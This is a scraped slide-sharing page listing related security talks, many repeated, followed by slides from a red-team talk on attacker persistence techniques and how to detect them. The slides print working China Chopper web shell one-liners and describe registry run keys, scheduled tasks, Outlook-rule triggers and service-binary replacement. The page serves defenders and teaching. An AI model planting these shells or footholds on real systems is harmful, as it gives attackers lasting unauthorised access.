This talk is about different attacker persistence techniques that we have seen in the wild, or published by other companies. We wanted to create a massive document containing all of these techniques with a mile wide, inch deep approach. Our goal is to give a description of how each technique works and a way to detect them to allow anyone to start looking for these specific techniques.
A Webinar on cyber Security Awareness and Digital Safety is hosted on the 7th of June, 2020. Sthir Yuwa in association with Information Security Response Team Nepal and Center For Cyber Security Research and Innovation conducted successfully. There were almost 70 participants on this webinar.
The top 10 windows logs event id's used v1.0Michael Gough
How to catch malicious activity on Windows systems using properly configured audit logging and the Top 10 events and more you must have enable, configured and alerting.
LOG-MD
MalwareArchaeology.com
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...MITRE - ATT&CKcon
From MITRE ATT&CKcon Power Hour January 2021
By Daniel Wyleczuk-Stern, Senior Security Engineer, Snowflake
Cyber security is inherently a function of risk management. Risk management is the identification, evaluation, and prioritization of risks followed by the effort to reduce those risks in a coordinated and economical manner (thanks wikipedia!). In this talk, Daniel will be going over some strategies for measuring and prioritizing your cyber risks using MITRE ATT&CK. He'll discuss some lessons learned in atomic testing of techniques vs attack chaining as well as what to measure and how to make decisions with that data.
Get more versatile and scalable protection with F5 BIG-IPF5NetworksAPJ
- Better protect against costly failures in outbound web security
- Improve scalability, availability, performance, and user experience
- Consolidate application access, secure web access, reducing network footprint and device management
A Webinar on cyber Security Awareness and Digital Safety is hosted on the 7th of June, 2020. Sthir Yuwa in association with Information Security Response Team Nepal and Center For Cyber Security Research and Innovation conducted successfully. There were almost 70 participants on this webinar.
The top 10 windows logs event id's used v1.0Michael Gough
How to catch malicious activity on Windows systems using properly configured audit logging and the Top 10 events and more you must have enable, configured and alerting.
LOG-MD
MalwareArchaeology.com
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...MITRE - ATT&CKcon
From MITRE ATT&CKcon Power Hour January 2021
By Daniel Wyleczuk-Stern, Senior Security Engineer, Snowflake
Cyber security is inherently a function of risk management. Risk management is the identification, evaluation, and prioritization of risks followed by the effort to reduce those risks in a coordinated and economical manner (thanks wikipedia!). In this talk, Daniel will be going over some strategies for measuring and prioritizing your cyber risks using MITRE ATT&CK. He'll discuss some lessons learned in atomic testing of techniques vs attack chaining as well as what to measure and how to make decisions with that data.
Get more versatile and scalable protection with F5 BIG-IPF5NetworksAPJ
- Better protect against costly failures in outbound web security
- Improve scalability, availability, performance, and user experience
- Consolidate application access, secure web access, reducing network footprint and device management
Advanced Persistent Threats (APTs) are a serious concern as they represent a threat to an organization’s intellectual property, financial assets and reputation. In some cases, these threats target critical infrastructure and government institutions, thereby threatening the country’s national security itself.
MITRE’s ATT&CK is a community-driven knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s life cycle and the platforms they are known to target. By scoping the wide breadth of the MITRE ATT&CK matrix to focus initially on the techniques used by threat actors you specifically care about, you can help the defenders create more useful and impactful detections first. Once you start emulating the appropriate threat actors, you can practice your defenses in a scenario that’s more realistic and applicable without the need for an actual intrusion. The speakers are providing a process and a case study of APT3 - a China-based threat group - for how to go from finding threat intelligence, sifting through it for actionable techniques, creating emulation plans, discovering how to emulate different techniques... to actually operating on a network. They are also providing a beginning "cheat sheet" for this actor to give a starting point for red and blue teams to accomplish these techniques in their own environment without the need to build their own tooling.
John Shaw, VP of Product management at Sophos, introduced us to the world of Project Galileo. What is Sophos doing to bring Network Security and Endpoint security together? How do we make these two pillars of IT security work together?
[CB19] Deep Exploit: Fully Automatic Penetration Test Tool Using Reinforcemen...CODE BLUE
DeepExploit is fully automated penetration testing tool using Deep Reinforcement Learning. It identifies the status of all opened ports on the target server and executes the exploit at pinpoint. DeepExploit’s key features are the following:
1) Efficiently execute exploit:
DeepExploit can execute exploits at pinpoint (minimum 1 attempt).
2) Deep penetration:
If DeepExploit succeeds the exploit to the target server (=compromised server) with in the perimeter network, then it executes the exploit to internal servers via compromised server.
3) Self-learning:
DeepExploit can learn how to exploitation by itself.
By using our DeepExploit, you will benefit from the following:
For penetration testers:
(a) They can greatly improve the test efficiency;
(b) The more penetration testers use DeepExploit, DeepExploit learns how to method of exploitation using Deep Reinforcement learning. As a result, accuracy of test can be improved.
For Information Security Officers:
(c) They can quickly identify vulnerabilities of own servers. As a result, prevent that attackers attack to your servers using vulnerabilities, and protect your reputation by avoiding the negative media coverage after breach.
Because attack methods to servers are evolving day by day, there is no guarantee that yesterday’s security countermeasures are safety today. It is necessary to quickly find vulnerabilities and take countermeasures. DeepExploit will contribute greatly to maintaining your safety.
The Offensive Security Certified Professional (OSCP) is one of the most technical and most challenging certifications for information security professionals.
For More information please contact us : https://www.infosectrain.com/
Ethical hacking : Its methodologies and toolschrizjohn896
This Presentation gives you the knowledge about ethical hacking and its methodologies. This PPT also explains the type of hackers and tools used with example of hashcat which is used to break hash algorithms like MD5, SHA1, SHA256 Etc
This presentation "Threat hunting on the wire" is part of a a series of courses on the subject of Threat Hunting. It covers command-line packet analysis, and network forensics.
Information Security Awareness, Petronas Marketing SudanAhmed Musaad
A two hours security awareness session that I presented for Petronas Marketing Sudan employees. The session includes -- but not limited to -- many topics like Passwords, Email Security, Social Networks Security, Physical Security, and Laptop Security.
You can use this as an introductory session for your security awareness training, but not as a sufficient one time session at all.
Your comments, feedback, and suggestions are much appreciated.
The OWASP Top 10 for Mobile Apps is highly focused on security checks for your mobile apps.
The OWASP Mobile Security Project is a centralized resource intended to give developers and security teams the resources they need to build and maintain secure mobile applications.
Practical Defensive Security
for Security Engineers.
This session will be an overview on the WAF book the practical defensive guide for security engineer and WAF owner.
A single email can cause a multi-million dollar breach if opened by an end-user with no security awareness, they may not even be aware of their mistake. The problem lies in the fact that only a few end-users are aware of the dangers of social engineering, much less how to detect it. It is a major issue in the business world today.
This document seeks to address the most common threats that can be posed to an entity and also recommend security measures that can be implemented to avoid such attacks.
Learn more at https://www.multinationalnetworks.com
Companies are struggling to deal with the unstoppable growth of cyber-attacks as hackers get faster, sneakier and more creative. The bad news is - no company is immune, no matter how big or small you are. Without a proper understanding of zero-day threats, companies have no way of exposing the gaps of overhyped security solutions.
Zero-day exploit leaves NO opportunity for detection. This presentation will highlight critical insights combating zero-day threats.
A Battle Against the Industry - Beating Antivirus for Meterpreter and MoreCTruncer
This talk goes over how stagers work in a different manner. Rather than standard function calls, I show how to utilize the same functionality in a slightly different way. It talks about Veil-Evasion, and a signature that was developed for it. Finally, I get into custom code and showcase three pieces of custom code that completely bypass antivirus.
This talk goes over the art of antivirus evasion, or really the lack thereof. I talk about a new module that's getting added into Veil-Evasion, a signature that was developed for Veil, and creating your own processes for approaching unknowns.
Advanced Persistent Threats (APTs) are a serious concern as they represent a threat to an organization’s intellectual property, financial assets and reputation. In some cases, these threats target critical infrastructure and government institutions, thereby threatening the country’s national security itself.
MITRE’s ATT&CK is a community-driven knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s life cycle and the platforms they are known to target. By scoping the wide breadth of the MITRE ATT&CK matrix to focus initially on the techniques used by threat actors you specifically care about, you can help the defenders create more useful and impactful detections first. Once you start emulating the appropriate threat actors, you can practice your defenses in a scenario that’s more realistic and applicable without the need for an actual intrusion. The speakers are providing a process and a case study of APT3 - a China-based threat group - for how to go from finding threat intelligence, sifting through it for actionable techniques, creating emulation plans, discovering how to emulate different techniques... to actually operating on a network. They are also providing a beginning "cheat sheet" for this actor to give a starting point for red and blue teams to accomplish these techniques in their own environment without the need to build their own tooling.
John Shaw, VP of Product management at Sophos, introduced us to the world of Project Galileo. What is Sophos doing to bring Network Security and Endpoint security together? How do we make these two pillars of IT security work together?
[CB19] Deep Exploit: Fully Automatic Penetration Test Tool Using Reinforcemen...CODE BLUE
DeepExploit is fully automated penetration testing tool using Deep Reinforcement Learning. It identifies the status of all opened ports on the target server and executes the exploit at pinpoint. DeepExploit’s key features are the following:
1) Efficiently execute exploit:
DeepExploit can execute exploits at pinpoint (minimum 1 attempt).
2) Deep penetration:
If DeepExploit succeeds the exploit to the target server (=compromised server) with in the perimeter network, then it executes the exploit to internal servers via compromised server.
3) Self-learning:
DeepExploit can learn how to exploitation by itself.
By using our DeepExploit, you will benefit from the following:
For penetration testers:
(a) They can greatly improve the test efficiency;
(b) The more penetration testers use DeepExploit, DeepExploit learns how to method of exploitation using Deep Reinforcement learning. As a result, accuracy of test can be improved.
For Information Security Officers:
(c) They can quickly identify vulnerabilities of own servers. As a result, prevent that attackers attack to your servers using vulnerabilities, and protect your reputation by avoiding the negative media coverage after breach.
Because attack methods to servers are evolving day by day, there is no guarantee that yesterday’s security countermeasures are safety today. It is necessary to quickly find vulnerabilities and take countermeasures. DeepExploit will contribute greatly to maintaining your safety.
The Offensive Security Certified Professional (OSCP) is one of the most technical and most challenging certifications for information security professionals.
For More information please contact us : https://www.infosectrain.com/
Ethical hacking : Its methodologies and toolschrizjohn896
This Presentation gives you the knowledge about ethical hacking and its methodologies. This PPT also explains the type of hackers and tools used with example of hashcat which is used to break hash algorithms like MD5, SHA1, SHA256 Etc
This presentation "Threat hunting on the wire" is part of a a series of courses on the subject of Threat Hunting. It covers command-line packet analysis, and network forensics.
Information Security Awareness, Petronas Marketing SudanAhmed Musaad
A two hours security awareness session that I presented for Petronas Marketing Sudan employees. The session includes -- but not limited to -- many topics like Passwords, Email Security, Social Networks Security, Physical Security, and Laptop Security.
You can use this as an introductory session for your security awareness training, but not as a sufficient one time session at all.
Your comments, feedback, and suggestions are much appreciated.
The OWASP Top 10 for Mobile Apps is highly focused on security checks for your mobile apps.
The OWASP Mobile Security Project is a centralized resource intended to give developers and security teams the resources they need to build and maintain secure mobile applications.
Practical Defensive Security
for Security Engineers.
This session will be an overview on the WAF book the practical defensive guide for security engineer and WAF owner.
A single email can cause a multi-million dollar breach if opened by an end-user with no security awareness, they may not even be aware of their mistake. The problem lies in the fact that only a few end-users are aware of the dangers of social engineering, much less how to detect it. It is a major issue in the business world today.
This document seeks to address the most common threats that can be posed to an entity and also recommend security measures that can be implemented to avoid such attacks.
Learn more at https://www.multinationalnetworks.com
Companies are struggling to deal with the unstoppable growth of cyber-attacks as hackers get faster, sneakier and more creative. The bad news is - no company is immune, no matter how big or small you are. Without a proper understanding of zero-day threats, companies have no way of exposing the gaps of overhyped security solutions.
Zero-day exploit leaves NO opportunity for detection. This presentation will highlight critical insights combating zero-day threats.
A Battle Against the Industry - Beating Antivirus for Meterpreter and MoreCTruncer
This talk goes over how stagers work in a different manner. Rather than standard function calls, I show how to utilize the same functionality in a slightly different way. It talks about Veil-Evasion, and a signature that was developed for it. Finally, I get into custom code and showcase three pieces of custom code that completely bypass antivirus.
This talk goes over the art of antivirus evasion, or really the lack thereof. I talk about a new module that's getting added into Veil-Evasion, a signature that was developed for Veil, and creating your own processes for approaching unknowns.
This talk is about developing malware in higher level languages. Languages such as Python or C# can give you the flexibility to quickly develop malware and use it on client engagements.
This is the talk given at NullCon 2017. This talk give s history of the Veil Framework, and showcases the differences between 2.0 and the newly released 3.0. Veil 3.0 is released in this talk
Bringing Down the House - How One Python Script Ruled Over AntiVirusCTruncer
This talk is about how a single python tool (Veil aka Veil-Evasion) is able to render AntiVirus useless. Veil's goal is to bypass antivirus products on workstations and servers.
This is the slide deck that I used when presenting at FSU's Cyber Security Club. This presentation was supposed to give a description of what Red Teaming, Pen Testing, and other roles do.
This talk describes the current state of the Veil-Framework and the different tools included in it such as Veil-Evasion, Veil-Catapult, Veil-Powerview, Veil-Pillage, Veil-Ordnance
This is the slide deck I gave when presenting at FSU's AITP Meeting. The goal was to give a high level description of what Pen Testing/Red Teaming is and what the job entails.
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationCTruncer
This presentation documents how Egress-Assess can be used on assessments to simulate exfiltrating data over a variety of protocols.
Additionally, this presentation documents the addition of malware modules into Egress-Assess. The new malware modules allow users to emulate different pieces of malware families by using documented malware indicators.
This talk goes over the host identification process we follow, the development of EyeWitness 1.0, the problems which lead to 2.0 and talk about future work on EyeWitness.
Egress-Assess and Owning Data ExfiltrationCTruncer
This talk discusses how Egress-Assess can be used to help attackers and defenders learn how to exfiltrate data outside of their network over a variety of protocols, describes how data is exfiltrated over different supported protocols, and demonstrates the weaponization of the tool!
This talk is about why I believe having the ability to write tools and/or scripts can help elevate a Pen Testers game to the next level.
The talk is case study driven by the different scenarios I've encountered on assessments and the scripts or tools that have been developed as a result.
Veil-Ordnance is a new tool recently added into the Veil-Framework. It's designed to quickly generate shellcode for exploits or use inside backdoor executables.
EyeWitness - A Web Application Triage ToolCTruncer
EyeWitness is a web application triage tool. It's designed to take a file from the user containing web pages, gather server header information, take a screenshot of the web page, and then organize all the information in a report. Additionally, EyeWitness will warn you about invalid SSL certificates, and attempt to identify any default credentials that may apply to the website.
The Supporting Role of Antivirus Evasion while PersistingCTruncer
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000CTruncer
This talk will initially cover Device Guard, and how it works. After discussing high level methods of attacking Device Guard, we will go into detail on WMImplant, a tool which can be used to operate on Device Guard protected systems.
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
This presentation, given at BSidesPittsburgh 2015, discusses free tools and techniques penetration testers use that can be translated to network defenders for immediate impact and value.
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
This presentation was given to a group of SFS students at GW. It's designed to be semi-case study driven on the problems I've encountered on assessments and how programming can help solve them.
This workshop was given at Crikeycon 2019 in Brisbane. It introduces Velociraptor and explains some of the design goals and implementation.
Note - this slide deck is outdated but might still be useful. The tool has evolved significantly since Crikeycon.
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates and Ken Johnson will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. This talk will most definitely be an entertaining one but a cautionary tale as well, provoking attendees into action. Ultimately, this is research targeted towards awareness for those operating within a DevOps environment.
Hacking Vulnerable Websites to Bypass FirewallsNetsparker
These slides were used by our security researcher Sven Morgenroth during the live demo of how to hack web applications and bypass firewalls. You can watch the live demo here: https://www.netsparker.com/blog/web-security/vulnerable-web-applications-developers-target/#livedemo
Web Application Penetration Testing.pdfbarayapaten
Web Application Penetration Testing (pengujian penetrasi aplikasi web) adalah proses simulasi serangan siber dunia nyata pada aplikasi web Anda untuk mengidentifikasi dan mengatasi kerentanannya. Dalam pengujian ini, para ahli keamanan siber memeriksa aplikasi web, situs web, atau layanan web untuk menemukan ancaman potensial yang dapat dieksploitasi oleh penjahat siber 123.
Berikut adalah langkah-langkah umum dalam melakukan pengujian penetrasi aplikasi web:
Pahami Tujuan: Tentukan tujuan pengujian. Apakah Anda ingin mengidentifikasi kerentanan, menguji keamanan aplikasi, atau mengevaluasi kepatuhan terhadap standar keamanan tertentu?
Identifikasi Target: Pilih aplikasi web yang akan diuji. Pastikan Anda memiliki izin dari pemilik aplikasi sebelum memulai pengujian.
Informasi Awal: Kumpulkan informasi tentang aplikasi web, termasuk arsitektur, teknologi yang digunakan, dan alamat URL.
Analisis Keamanan: Lakukan analisis keamanan dengan mengidentifikasi kerentanan potensial seperti SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), dan lainnya.
Uji Manual: Lakukan pengujian manual dengan mengikuti skenario serangan yang mungkin dilakukan oleh penyerang. Ini melibatkan eksplorasi aplikasi, mengirim permintaan palsu, dan memeriksa tanggapan.
Uji Otomatis: Gunakan alat otomatis untuk mengidentifikasi kerentanan secara lebih efisien. Beberapa alat populer termasuk OWASP ZAP, Burp Suite, dan Nessus.
Laporan Hasil: Setelah selesai, buat laporan yang berisi temuan kerentanan, tingkat keparahan, dan rekomendasi perbaikan.
Ingatlah bahwa pengujian penetrasi aplikasi web sangat penting untuk melindungi aplikasi Anda dari ancaman siber.
Progressive Web App Testing With Cypress.ioKnoldus Inc.
Cypress.io is a frontend automation testing tool built for modern web applications developed on some of the emerging technologies like Reactjs, Ionic, Vue, and Angular.
Cypress is a test automation tool that can perform fast, easy and reliable testing for anything that runs in a browser.
Learn how Decisiv provides secure access to developers and deals with compliance hurdles. Senior Engineer Hunter Madison will talk about how Decisiv needed to quickly solve the pain of scaling the engineering team, migrating to AWS, maintaining ISO 27002 compliance, and a few of his key learnings from his two-year journey using Teleport.
Similar to Ever Present Persistence - Established Footholds Seen in the Wild (20)
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Search and Society: Reimagining Information Access for Radical FuturesBhaskar Mitra
The field of Information retrieval (IR) is currently undergoing a transformative shift, at least partly due to the emerging applications of generative AI to information access. In this talk, we will deliberate on the sociotechnical implications of generative AI for information access. We will argue that there is both a critical necessity and an exciting opportunity for the IR community to re-center our research agendas on societal needs while dismantling the artificial separation between the work on fairness, accountability, transparency, and ethics in IR and the rest of IR research. Instead of adopting a reactionary strategy of trying to mitigate potential social harms from emerging technologies, the community should aim to proactively set the research agenda for the kinds of systems we should build inspired by diverse explicitly stated sociotechnical imaginaries. The sociotechnical imaginaries that underpin the design and development of information access technologies needs to be explicitly articulated, and we need to develop theories of change in context of these diverse perspectives. Our guiding future imaginaries must be informed by other academic fields, such as democratic theory and critical theory, and should be co-developed with social science scholars, legal scholars, civil rights and social justice activists, and artists, among others.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
2. Whoami
● Evan Pena (@evan_pena2003)
○ Mandiant’s West Coast Red Team Functional Lead
○ Open Source Developer
■ ADEnumerator
■ NessusCombiner
■ NMapParser, etc.
4. What’s this talk about?
● Persistence
● Persisting Networks vs. Hosts
○ The Old Ways
○ New School
● What else is needed?
○ Application
○ Privilege Levels
● Detection
6. Persistence
● Main goal is continued access to a
network, host, privilege level, or
whatever.
● Persistence can overlap depending on
your goal. E.g. persisting a host to persist
a network.
8. Host Based
● We’re looking to have ad-hoc, or
programmatically defined access to a
system as close to on-demand as possible.
● All efforts in this phase are restricted to
the individual system we are targeting.
9. Host Based
● What do we need to be able to do?
○ Survive Reboots – the most important
aspect.
○ Compliment network based persistence.
○ Foothold into sensitive systems.
10. Network Based
● We’ve seen it used in two contexts:
○ Used to maintain access into a network
■ This is incredibly similar to host-based
persistence, but could be cosidered
network based for the intent it is used.
11. Network Based
○ Used to maintain access to different
network segments.
■ Don’t want to be VLANed off in a VOIP
network.
12. Network Based
● What do we want to do here?
○ Maintain persistence into unique
networks.
○ Access likely facilitated through host-
based persistence.
14. Web Shells
● Funny, this almost seems trivial and too
easy that no one should use it.
○ That is not the case
■ China Chopper - APT17, APT19, APT22
■ ITSecShell, reDuh, ASPShell
■ Really, even just commodity code
15. China Chopper
● Very tiny webshell, about 4 kb stored
server-side.
● Can be in a variety of languages (cfm,
asp, php, etc.)
● Uses a client application to interact with
the webshell
16. China Chopper Server Code
● ASPX
○ <%@ Page Language="Jscript"%><
%eval(Request.Item["password"],"unsafe"
);%>
● PHP
○ <?php @eval($_POST['password']);?>
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
18. China Chopper
● Pretty awesome features in it
○ File Explorer - including uploading and
downloading of files, mod of timestamp
○ Database Client - mssql, mysql
○ Command Shell - normal ownage
19. Web Shell Prevention/Detection
● Hunt for known bad files
○ Hashes, other file/text-based indicators
● Blacklist all filetypes except expected
files for upload functionality
● Don’t allow your web server to execute
files uploaded from untrusted sources
20. Magic Packet
● Or, how to access port 12345 with a
packet to port 443
● Attacker’s problem:
○ Compromised a web server (ports 80
and 443 are occupied)
21. Magic Packet
○ Firewalls prevent connections to any
other port
○ Wants a TCP backdoor to be remotely
accessible
■ Can’t be bothered to write a web
shell
22. Magic Packet - Creative Solution
● Run backdoor, listening on 12345
● Run malware “low” in the network stack
that will:
○ Check incoming TCP SYN packets
○ When a SYN packet contains a specific
signature, change the destination port
from 443 to 12345
23. Magic Packet - Creative Solution
○ Windows network stack will deliver the
packet to backdoor
○ Malware alters the port in all
subsequent packets for that TCP
stream
25. Outlook
● Outlook rules can help provide a really
unique way to gain access to a system.
● Silent Break wrote a post on leveraging
outlook rules to gain access to a user’s
system.
○ Focused on access, but can be used for
persistence too :)
h"ps://silentbreaksecurity.com/malicious-outlook-rules/
26. Outlook
● Create a modified Outlook rule to
execute a binary when the trigger subject
is received.
● Sync the rule against target user account.
● Send e-mail that triggers the rule.
● Get shell :)
28. Outlook
● Additional tweaks
○ Have it auto-delete the e-mail when it
arrives to prevent detection from the
user/victim
● https://silentbreaksecurity.com/malicious-outlook-rules/
29. Outlook
● Detection:
○ Casey Smith – Link for searching server-
side rules
○ https://blogs.msdn.microsoft.com/canberrapfe/2012/11/05/ever-needed-to-find-server-side-outlook-rules-that-forward-
mail-outside-of-your-organisation/
○ Main IOC is a rule set to execute a binary
when a certain event happens.
32. Registry Hacks
● Probably the 101 method of host based
persistence.
● Really easy to setup, and can be
configured from varying levels of
permissions.
● Can be used to compliment new ways.
33. Registry Hacks
● You can configure it to run when the
machine starts, or when a user logs into
the machine.
○ HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun
○ HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun
● These methods are also highly publicized
and are the first thing most defensive
tools look for.
34. Registry Hacks
● Can be good for helping to solidify initial
access, but I wouldn’t use them for long
term persistence.
○ Hopefully most teams should have the
ability to detect these and therefore
shouldn’t be relied on.
35. Startup Folder
● Startup folder will execute all files in the
folder.
○ C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup
36. Scheduled Tasks
● Scheduled tasks are a fairly easy way for
a user of any level to persist a system.
● If you have the proper permissions, you
can schedule up to SYSTEM level tasks.
● This is Microsoft’s recommendation/
alternative to stop using AT.
37. Scheduled Tasks
● Scheduled tasks can be created from the
command line with schtasks.exe or GUI.
● These can run on system startup, when a
user logs into the system, after the system
has been idle, etc.
● This can run binaries, powershell one
liners, or others.
40. Scheduled Tasks Detection
● Get a baseline of the different tasks set
to run on a system
○ schtasks /query
○ Look in the Task Scheduler
○ Scheduled task log analysis
● Periodically audit systems to identify
deviations
41. Service Manipulation
● Services typically run with SYSTEM level
permissions, so they are a great candidate
to target.
● Easiest way to install a service based
persistence (if not admin) is to check for
write permissions to existing services.
43. Service Manipulation
● :) Now that targets have found, you need
a malicious service binary.
○ Veil-Evasion, PowerUp, custom code,
etc.
● Save off the original service, and then
replace it with your malicious binary.
